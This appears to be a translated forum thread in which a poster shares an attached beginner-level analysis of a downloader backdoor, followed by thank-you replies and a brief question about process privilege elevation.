PS: this is a downloader backdoor and still fairly simple; what matters is working the flow out clearly so that you do not get lost among the API calls. It suits new hands who want to analyse malware, since it is almost entirely API calls. I analysed it a while ago, came across it again today, and am sharing it. Because so much of the functionality cannot run, the analysis was rather painful. If you are more capable, try something tougher.
Posting images is a hassle, so I put them in the document; when will DZ let us paste images directly T_T~~ See the idb and the document for details.
Attachment:
Attachment downloaded, studying hard.
Thanks for sharing.
wgz001 posted on 2013-9-25 08:50:
Attachment downloaded, studying hard.
Study hard and make progress every day.
This post was last edited by L4Nce on 2013-9-25 12:38.
When will I be able to analyse viruses like master jc does? Can't bear it.
Soap thrown.
Nice, learned something. Study hard and make progress every day.
I don't quite understand the privilege-elevation part, could the OP explain?
niklaus520 posted on 2014-1-4 16:14:
I don't quite understand the privilege-elevation part, could the OP explain?
Process privilege elevation?
JoyChou posted on 2014-1-4 16:32:
Process privilege elevation?
Yes, that's right.